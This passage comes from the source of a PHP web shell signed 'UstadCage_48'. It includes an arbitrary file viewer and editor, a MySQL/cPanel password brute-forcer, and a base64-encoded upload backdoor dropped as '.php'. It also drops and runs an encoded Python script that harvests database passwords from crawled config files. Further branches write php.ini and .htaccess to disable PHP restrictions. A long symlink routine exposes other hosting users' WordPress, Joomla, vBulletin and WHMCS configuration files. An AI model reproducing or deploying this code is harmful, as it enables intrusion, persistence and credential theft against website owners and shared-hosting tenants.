898 <tr><td>Admin</td><td>".$owner."</td></tr>
899 <tr><td>Create time</td><td>".date("d-M-Y H:i",@filectime($file))."</td></tr>
900 <tr><td>Last modified</td><td>".date("d-M-Y H:i",@filemtime($file))."</td></tr>
901 <tr><td>Last accessed</td><td>".date("d-M-Y H:i",@fileatime($file))."</td></tr>
902 <tr><td>Actions</td><td><a href=\"?y=$pwd&edit=$file\">Edit</a> | <a href=\"javascript:tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\">Rename</a> | <a href=\"?y=$pwd&delete=$file\">Delete</a> | <a href=\"?y=$pwd&dl=$file\">Download</a> (<a href=\"?y=$pwd&dlgzip=$file\">Gzip</a>)</td></tr>
903 <tr><td>View</td><td><a href=\"?y=".$pwd."&view=".$file."\">text</a> | <a href=\"?y=".$pwd."&view=".$file."&type=code\">code</a> | <a href=\"?y=".$pwd."&view=".$file."&type=image\">image</a></td></tr>
904 </table>
905 ";
906 if(isset($_GET['type']) && ($_GET['type']=='image')){
907 echo "<div style=\"text-align:center;margin:8px;\"><img src=\"?y=".$pwd."&img=".$filn."\"></div>";
908 }
909 elseif(isset($_GET['type']) && ($_GET['type']=='code')){
910 echo "<div class=\"viewfile\">";
911 $file = wordwrap(@file_get_contents($file),"240","\n");
912 @highlight_string($file);
913 echo "</div>";
914 }
915 else {
916 echo "<div align=\"left\" class=\"viewfile\">";
917 echo nl2br(htmlentities((@file_get_contents($file))));
918 echo "</div>";
919 }
920 }
921 elseif(is_dir($_GET['view'])){
922 echo showdir($pwd,$prompt);
923 }
924
925}
926//////////////////////////////////////////////////
927
928elseif(isset($_GET['edit']) && ($_GET['edit'] != "")){
929
930 if(isset($_POST['save'])){
931 $file = $_POST['saveas'];
932 $content = magicboom($_POST['content']);
933 if($filez = @fopen($file,"w")){
934 $time = date("d-M-Y H:i",time());
935 if(@fwrite($filez,$content)) $msg = "file saved <span class=\"gaya\">@</span> ".$time;
936 else $msg = "failed to save";
937 @fclose($filez);
938 }
939 else $msg = "permission denied";
940 }
941 if(!isset($file)) $file = $_GET['edit'];
942 if($filez = @fopen($file,"r")){
943 $content = "";
944 while(!feof($filez)){
945 $content .= htmlentities(str_replace("'","'",fgets($filez)));
946 }
947 @fclose($filez);
948 }
949
950?>
951<form action="?y=<?php echo $pwd; ?>&edit=<?php echo $file; ?>" method="post">
952<table class="cmdbox">
953<tr><td colspan="2">
954<textarea class="output" name="content">
955<?php echo $content; ?>
956</textarea>
957<tr><td colspan="2">Save as <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="saveas" style="width:60%;" value="<?php echo $file; ?>" /><input class="inputzbut" type="submit" value="Save !" name="save" style="width:12%;" />
958 <?php echo $msg; ?></td></tr>
959</table>
960</form>
961<?php
962}
963elseif(isset($_GET['x']) && ($_GET['x'] == 'logout'))
964{
965?>
966<form action="?y=<?php echo $pwd; ?>&x=logout" method="post">
967
968<?php
969 unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
970 echo '<br><center><b>Logged Out <br>Bye-Bye :v USTADCAGE_48</b></center>';
971}
972elseif(isset($_GET['x']) && ($_GET['x'] == 'brute'))
973 {
974 ?>
975 <form action="?y=<?php echo $pwd; ?>&x=brute" method="post">
976 <?php
977 //cpanel bruteforce
978?>
979<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
980<?php
981
982@set_time_limit(0);
983@error_reporting(0);
984
985
986if($_POST['page']=='find')
987{
988if(isset($_POST['usernames']) && isset($_POST['passwords']))
989{
990 if($_POST['type'] == 'passwd'){
991 $e = explode("\n",$_POST['usernames']);
992 foreach($e as $value){
993 $k = explode(":",$value);
994 $username .= $k['0']." ";
995 }
996 }elseif($_POST['type'] == 'simple'){
997 $username = str_replace("\n",' ',$_POST['usernames']);
998 }
999 $a1 = explode(" ",$username);
1000 $a2 = explode("\n",$_POST['passwords']);
1001 $id2 = count($a2);
1002 $ok = 0;
1003 foreach($a1 as $user )
1004 {
1005 if($user !== ')
1006 {
1007 $user=trim($user);
1008 for($i=0;$i<=$id2;$i++)
1009 {
1010 $pass = trim($a2[$i]);
1011 if(@mysql_connect('localhost',$user,$pass))
1012 {
1013 echo "zoo !! ~ user is (<b><font color=white>$user</font></b>) Password is (<b><font color=white>$pass</font></b>)<br />";
1014 $ok++;
1015 }
1016 }
1017 }
1018 }
1019 echo "<hr><b> Cpanel found = <font color=white>$ok</font> By UstadCage_48</b>";
1020 echo "<center><b><a href=".$_SERVER['PHP_SELF']."><< BACK</a>";
1021 exit;
1022}
1023}
1024if($_POST['pass']=='password'){
1025@error_reporting(0);
1026$i = getenv('REMOTE_ADDR');
1027$d = date('D, M jS, Y H:i',time());
1028$h = $_SERVER['HTTP_HOST'];
1029$dir=$_SERVER['PHP_SELF'];
1030$back = "PD9waHANCmVjaG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG5hbWU9InVwbG9hZGVyIiBpZD0idXBsb2FkZXIiPic7DQplY2hvICc8aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZSIgc2l6ZT0iNTAiPjxpbnB1dCBuYW1lPSJfdXBsIiB0eXBlPSJzdWJtaXQiIGlkPSJfdXBsIiB2YWx1ZT0iVXBsb2FkIj48L2Zvcm0+JzsNCmlmKCAkX1BPU1RbJ191cGwnXSA9PSAiVXBsb2FkIiApIHsNCmlmKEBjb3B5KCRfRklMRVNbJ2ZpbGUnXVsndG1wX25hbWUnXSwgJF9GSUxFU1snZmlsZSddWyduYW1lJ10pKSB7IGVjaG8gJzxiPktvcmFuZyBEYWggQmVyamF5YSBVcGxvYWQgU2hlbGwgS29yYW5nISEhPGI+PGJyPjxicj4nOyB9DQplbHNlIHsgZWNobyAnPGI+S29yYW5nIEdhZ2FsIFVwbG9hZCBTaGVsbCBLb3JhbmchISE8L2I+PGJyPjxicj4nOyB9DQp9DQo/Pg==";
1031$file = fopen(".php","w+");
1032$write = fwrite ($file ,base64_decode($back));
1033fclose($file);
1034chmod(".php",0755);
1035mkdir('config',0755);
1036$cp =
1037'IyEvdXNyL2Jpbi9lbnYgcHl0aG9uDQoNCicnJw0KQnk6IEFobWVkIFNoYXdreSBha2EgbG54ZzMzaw0KdGh4OiBPYnp5LCBSZWxpaywgbW9oYWIgYW5kICNhcmFicHduIA0KJycnDQoNCmltcG9ydCBzeXMNCmltcG9ydCBvcw0KaW1wb3J0IHJlDQppbXBvcnQgc3VicHJvY2Vzcw0KaW1wb3J0IHVybGxpYg0KaW1wb3J0IGdsb2INCmZyb20gcGxhdGZvcm0gaW1wb3J0IHN5c3RlbQ0KDQppZiBsZW4oc3lzLmFyZ3YpICE9IDM6DQogIHByaW50JycnCQ0KIFVzYWdlOiAlcyBbVVJMLi4uXSBbZGlyZWN0b3J5Li4uXQ0KIEV4KSAlcyBodHRwOi8vd3d3LnRlc3QuY29tL3Rlc3QvIFtkaXIgLi4uXScnJyAlIChzeXMuYXJndlswXSwgc3lzLmFyZ3ZbMF0pDQogIHN5cy5leGl0KDEpDQoNCnNpdGUgPSBzeXMuYXJndlsxXQ0KZm91dCA9IHN5cy5hcmd2WzJdDQoNCnRyeToNCiAgcmVxICA9IHVybGxpYi51cmxvcGVuKHNpdGUpDQogIHJlYWQgPSByZXEucmVhZCgpDQogIGlmIHN5c3RlbSgpID09ICdMaW51eCc6DQogICAgZiA9IG9wZW4oJy90bXAvZGF0YS50eHQnLCAndycpDQogICAgZi53cml0ZShyZWFkKQ0KICAgIGYuY2xvc2UoKQ0KICBpZiBzeXN0ZW0oKSA9PSAnV2luZG93cyc6DQogICAgZiA9IG9wZW4oJ2RhdGEudHh0JywgJ3cnKSAgDQogICAgZi53cml0ZShyZWFkKQ0KICAgIGYuY2xvc2UoKQ0KDQogIGkgPSAwDQogIGlmIHN5c3RlbSgpID09ICdMaW51eCc6DQogICAgZiA9IG9wZW4oJy90bXAvZGF0YS50eHQnLCAnclUnKQ0KICAgIGZvciBsaW5lIGluIGY6DQogICAgICBpZiBsaW5lLnN0YXJ0c3dpdGgoJzxsaT48YScpID09IFRydWUgOg0KICAgICAgICBtID0gcmUuc2VhcmNoKHInKDxhIGhyZWY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0uZ3JvdXAoMiksIGxvY2FsX25hbWUpDQogICAgICAgIGV4Y2VwdCBJT0Vycm9yOg0KICAgICAgICAgIHByaW50ICdcblslc10gZG9lc25cJ3QgZXhpc3QsIGNyZWF0ZSBpdCBmaXJzdCcgJSBmb3V0DQogICAgICAgICAgc3lzLmV4aXQoKQ0KICAgICAgaWYgbGluZS5zdGFydHN3aXRoKCc8aW1nJykgPT0gVHJ1ZToNCiAgICAgICAgbTEgPSByZS5zZWFyY2gocicoPGEgaHJlZj0iKSguK1tePl0pKCI+KScsIGxpbmUpDQogICAgICAgIGkgKz0gMQ0KICAgICAgICBsb2NhbF9uYW1lID0gJyVzL2ZpbGUlZC50eHQnICUgKGZvdXQsIGkpDQogICAgICAgIHByaW50ICdSZXRyaWV2aW5nLi4uXHRcdCcsIHNpdGUgKyBtMS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0xLmdyb3VwKDIpLCBsb2NhbF9uYW1lKQ0KICAgICAgICBleGNlcHQgSU9FcnJvcjoNCiAgICAgICAgICBwcmludCAnXG5bJXNdIGRvZXNuXCd0IGV4aXN0LCBjcmVhdGUgaXQgZmlyc3QnICUgZm91dA0KICAgICAgICAgIHN5cy5leGl0KCkNCiAgICAgIGlmIGxpbmUuc3RhcnRzd2l0aCgnPElNRycpID09IFRydWU6DQogICAgICAgIG0yID0gcmUuc2VhcmNoKHInKDxBIEhSRUY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbTIuZ3JvdXAoMikNCiAgICAgICAgdHJ5OiAgdXJsbGliLnVybHJldHJpZXZlKHNpdGUgKyBtMi5ncm91cCgyKSwgbG9jYWxfbmFtZSkNCiAgICAgICAgZXhjZXB0IElPRXJyb3I6DQogICAgICAgICAgcHJpbnQgJ1xuWyVzXSBkb2VzblwndCBleGlzdCwgY3JlYXRlIGl0IGZpcnN0JyAlIGZvdXQNCiAgICAgICAgICBzeXMuZXhpdCgpDQogICAgZi5jbG9zZSgpDQogIGlmIHN5c3RlbSgpID09ICdXaW5kb3dzJzoNCiAgICBmID0gb3BlbignZGF0YS50eHQnLCAnclUnKQ0KICAgIGZvciBsaW5lIGluIGY6DQogICAgICBpZiBsaW5lLnN0YXJ0c3dpdGgoJzxsaT48YScpID09IFRydWUgOg0KICAgICAgICBtID0gcmUuc2VhcmNoKHInKDxhIGhyZWY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0uZ3JvdXAoMiksIGxvY2FsX25hbWUpDQogICAgICAgIGV4Y2VwdCBJT0Vycm9yOg0KICAgICAgICAgIHByaW50ICdcblslc10gZG9lc25cJ3QgZXhpc3QsIGNyZWF0ZSBpdCBmaXJzdCcgJSBmb3V0DQogICAgICAgICAgc3lzLmV4aXQoKQ0KICAgICAgaWYgbGluZS5zdGFydHN3aXRoKCc8aW1nJykgPT0gVHJ1ZToNCiAgICAgICAgbTEgPSByZS5zZWFyY2gocicoPGEgaHJlZj0iKSguK1tePl0pKCI+KScsIGxpbmUpDQogICAgICAgIGkgKz0gMQ0KICAgICAgICBsb2NhbF9uYW1lID0gJyVzL2ZpbGUlZC50eHQnICUgKGZvdXQsIGkpDQogICAgICAgIHByaW50ICdSZXRyaWV2aW5nLi4uXHRcdCcsIHNpdGUgKyBtMS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0xLmdyb3VwKDIpLCBsb2NhbF9uYW1lKQ0KICAgICAgICBleGNlcHQgSU9FcnJvcjoNCiAgICAgICAgICBwcmludCAnXG5bJXNdIGRvZXNuXCd0IGV4aXN0LCBjcmVhdGUgaXQgZmlyc3QnICUgZm91dA0KICAgICAgICAgIHN5cy5leGl0KCkNCiAgICAgIGlmIGxpbmUuc3RhcnRzd2l0aCgnPElNRycpID09IFRydWU6DQogICAgICAgIG0yID0gcmUuc2VhcmNoKHInKDxBIEhSRUY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbTIuZ3JvdXAoMikNCiAgICAgICAgdHJ5OiAgdXJsbGliLnVybHJldHJpZXZlKHNpdGUgKyBtMi5ncm91cCgyKSwgbG9jYWxfbmFtZSkNCiAgICAgICAgZXhjZXB0IElPRXJyb3I6DQogICAgICAgICAgcHJpbnQgJ1xuWyVzXSBkb2VzblwndCBleGlzdCwgY3JlYXRlIGl0IGZpcnN0JyAlIGZvdXQNCiAgICAgICAgICBzeXMuZXhpdCgpDQogICAgZi5jbG9zZSgpDQogIGlmIHN5c3RlbSgpID09ICdMaW51eCc6DQogICAgY2xlYW51cCA9IHN1YnByb2Nlc3MuUG9wZW4oJ3JtIC1yZiAvdG1wL2RhdGEudHh0ID4gL2Rldi9udWxsJywgc2hlbGw9VHJ1ZSkud2FpdCgpDQogIGlmIHN5c3RlbSgpID09ICdXaW5kb3dzJzoNCiAgICBjbGVhbnVwID0gc3VicHJvY2Vzcy5Qb3BlbignZGVsIEM6XGRhdGEudHh0Jywgc2hlbGw9VHJ1ZSkud2FpdCgpDQogIHByaW50ICdcbicsICctJyAqIDEwMCwgJ1xuJw0KICBpZiBzeXN0ZW0oKSA9PSAnTGludXgnOg0KICAgIGZvciByb290LCBkaXJzLCBmaWxlcyBpbiBvcy53YWxrKGZvdXQpOg0KICAgICAgZm9yIGZuYW1lIGluIGZpbGVzOg0KICAgICAgICBmdWxscGF0aCA9IG9zLnBhdGguam9pbihyb290LCBmbmFtZSkNCiAgICAgICAgZiA9IG9wZW4oZnVsbHBhdGgsICdyJykNCiAgICAgICAgZm9yIGxpbmUgaW4gZjoNCiAgICAgICAgICBzZWNyID0gcmUuc2VhcmNoIChyIihkYl9wYXNzd29yZCddID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICAgIGlmIHNlY3IgaXMgbm90IE5vbmU6IHByaW50IChzZWNyLmdyb3VwKDIpKSAgDQogICAgICAgICAgc2VjcjEgPSByZS5zZWFyY2gociIocGFzc3dvcmQgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjEgaXMgbm90IE5vbmU6ICBwcmludCAgKHNlY3IxLmdyb3VwKDIpKQ0KICAgICAgICAgIHNlY3IyID0gcmUuc2VhcmNoKHIiKERCX1BBU1NXT1JEJykoLi4uKSguK1tePl0pKCcpIiwgbGluZSkNCiAgICAgICAgICBpZiBzZWNyMiBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3IyLmdyb3VwKDMpKQ0KICAgICAgICAgIHNlY3IzID0gcmUuc2VhcmNoIChyIihkYnBhc3MgPS4uKSguK1tePl0pKC47KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjMgaXMgbm90IE5vbmU6IHByaW50IChzZWNyMy5ncm91cCgyKSkNCiAgICAgICAgICBzZWNyNCA9IHJlLnNlYXJjaCAociIoREJQQVNTV09SRCA9ICcpKC4rW14+XSkoLjspIiwgbGluZSkNCiAgICAgICAgICBpZiBzZWNyNCBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3I0Lmdyb3VwKDIpKQ0KICAgICAgICAgIHNlY3I1ID0gcmUuc2VhcmNoIChyIihEQnBhc3MgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjUgaXMgbm90IE5vbmU6IHByaW50IChzZWNyNS5ncm91cCgyKSkNCiAgICAgICAgICBzZWNyNiA9IHJlLnNlYXJjaCAociIoZGJwYXNzd2QgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjYgaXMgbm90IE5vbmU6IHByaW50IChzZWNyNi5ncm91cCgyKSkNCiAgICAgICAgICBzZWNyNyA9IHJlLnNlYXJjaCAociIobW9zQ29uZmlnX3Bhc3N3b3JkID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICAgIGlmIHNlY3I3IGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjcuZ3JvdXAoMikpDQogICAgICAgIGYuY2xvc2UoKQ0KICBpZiBzeXN0ZW0oKSA9PSAnV2luZG93cyc6DQogICAgZm9yIGluZmlsZSBpbiBnbG9iLmdsb2IoIG9zLnBhdGguam9pbihmb3V0LCAnKi50eHQnKSApOg0KICAgICAgZiA9IG9wZW4oaW5maWxlLCAncicpDQogICAgICBmb3IgbGluZSBpbiBmOg0KICAgICAgICBzZWNyID0gcmUuc2VhcmNoIChyIihkYl9wYXNzd29yZCddID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICBpZiBzZWNyIGlzIG5vdCBOb25lOiBwcmludCAoc2Vjci5ncm91cCgyKSkgIA0KICAgICAgICBzZWNyMSA9IHJlLnNlYXJjaChyIihwYXNzd29yZCA9ICcpKC4rW14+XSkoJzspIiwgbGluZSkNCiAgICAgICAgaWYgc2VjcjEgaXMgbm90IE5vbmU6ICBwcmludCAgKHNlY3IxLmdyb3VwKDIpKQ0KICAgICAgICBzZWNyMiA9IHJlLnNlYXJjaChyIihEQl9QQVNTV09SRCcpKC4uLikoLitbXj5dKSgnKSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3IyIGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjIuZ3JvdXAoMykpDQogICAgICAgIHNlY3IzID0gcmUuc2VhcmNoIChyIihkYnBhc3MgPS4uKSguK1tePl0pKC47KSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3IzIGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjMuZ3JvdXAoMikpDQogICAgICAgIHNlY3I0ID0gcmUuc2VhcmNoIChyIihEQlBBU1NXT1JEID0gJykoLitbXj5dKSguOykiLCBsaW5lKQ0KICAgICAgICBpZiBzZWNyNCBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3I0Lmdyb3VwKDIpKQ0KICAgICAgICBzZWNyNSA9IHJlLnNlYXJjaCAociIoREJwYXNzID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICBpZiBzZWNyNSBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3I1Lmdyb3VwKDIpKQ0KICAgICAgICBzZWNyNiA9IHJlLnNlYXJjaCAociIoZGJwYXNzd2QgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3I2IGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjYuZ3JvdXAoMikpDQogICAgICAgIHNlY3I3ID0gcmUuc2VhcmNoIChyIihtb3NDb25maWdfcGFzc3dvcmQgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3I3IGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjcuZ3JvdXAoMikpDQogICAgICBmLmNsb3NlKCkNCmV4Y2VwdCAoS2V5Ym9hcmRJbnRlcnJ1cHQpOg0KICBwcmludCAnXG5UaGFua3MgZm9yIHVzaW5nIGl0IC5fXic=';
1038$file = fopen("cp.py","w+");
1039$write = fwrite ($file ,base64_decode($cp));
1040fclose($file);
1041chmod("cp.py",0755);
1042$url = $_POST['url'];
1043echo"<center>
1044<textarea cols=\"90\" rows=\"20\" name=\"usernames\">";
1045system("python cp.py $url config");
1046unlink ('cp.py');
1047echo"</textarea>
1048</center>";
1049echo "<hr><center><b><a href=".$_SERVER['PHP_SELF'].">BACK</a>";
1050exit;
1051}
1052if($_POST['matikan']=='sekatan'){
1053@error_reporting(0);
1054$phpini =
1055'c2FmZV9tb2RlPU9GRg0KZGlzYWJsZV9mdW5jdGlvbnM9Tk9ORQ==';
1056$file = fopen("php.ini","w+");
1057$write = fwrite ($file ,base64_decode($phpini));
1058fclose($file);
1059$htaccess =
1060'T3B0aW9ucyBGb2xsb3dTeW1MaW5rcyBNdWx0aVZpZXdzIEluZGV4ZXMgRXhlY0NHSQ==';
1061$file = fopen(".htaccess","w+");
1062$write = fwrite ($file ,base64_decode($htaccess));
1063echo "<hr><center><b>DONE!";
1064echo "<hr><center><b><a href=".$_SERVER['PHP_SELF'].">BACK</a>";
1065exit;
1066}
1067if($_POST['mendapatkan']=='passwd'){
1068@set_magic_quotes_runtime(0);
1069ob_start();
1070error_reporting(0);
1071@set_time_limit(0);
1072@ini_set('max_execution_time',0);
1073@ini_set('output_buffering',0);
1074$fn = $_POST['foldername'];
1075//all function here
1076
1077function syml($usern,$pdomain)
1078 {
1079 symlink('/home/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
1080 symlink('/home/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
1081 symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
1082 symlink('/home/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
1083 symlink('/home/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
1084 symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
1085 symlink('/home/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
1086 symlink('/home/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
1087 symlink('/home/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
1088 symlink('/home/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
1089 symlink('/home/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
1090 symlink('/home/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
1091 symlink('/home/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
1092 symlink('/home/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
1093 symlink('/home/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
1094 symlink('/home/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
1095 symlink('/home/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
1096 symlink('/home/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
1097 symlink('/home/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
1098 symlink('/home/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
1099 symlink('/home/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
1100 symlink('/home/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
1101 symlink('/home/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
1102 symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
1103 symlink('/home/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
1104 symlink('/home/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
1105 symlink('/home/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
1106 symlink('/home/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
1107 symlink('/home/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
1108 symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
1109 symlink('/home2/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
1110 symlink('/home2/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
1111 symlink('/home2/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
1112 symlink('/home2/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
1113 symlink('/home2/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
1114 symlink('/home2/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
1115 symlink('/home2/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
1116 symlink('/home2/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
1117 symlink('/home2/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
1118 symlink('/home2/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
1119 symlink('/home2/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
1120 symlink('/home2/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
1121 symlink('/home2/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
1122 symlink('/home2/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
1123 symlink('/home2/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
1124 symlink('/home2/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
1125 symlink('/home2/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
1126 symlink('/home2/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
1127 symlink('/home2/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
1128 symlink('/home2/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
1129 symlink('/home2/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
1130 symlink('/home2/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
1131 symlink('/home2/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
1132 symlink('/home2/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
1133 symlink('/home2/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
1134 symlink('/home2/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
1135 symlink('/home2/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
1136 symlink('/home2/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
1137 symlink('/home2/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
1138 symlink('/home2/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
1139 symlink('/home3/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
1140 symlink('/home3/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
1141 symlink('/home3/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
1142 symlink('/home3/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
1143 symlink('/home3/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
1144 symlink('/home3/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
1145 symlink('/home3/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
1146 symlink('/home3/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
1147 symlink('/home3/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
1148 symlink('/home3/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
1149 symlink('/home3/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
1150 symlink('/home3/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
1151 symlink('/home3/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
1152 symlink('/home3/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
1153 symlink('/home3/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
1154 symlink('/home3/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
1155 symlink('/home3/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
1156 symlink('/home3/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
1157 symlink('/home3/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
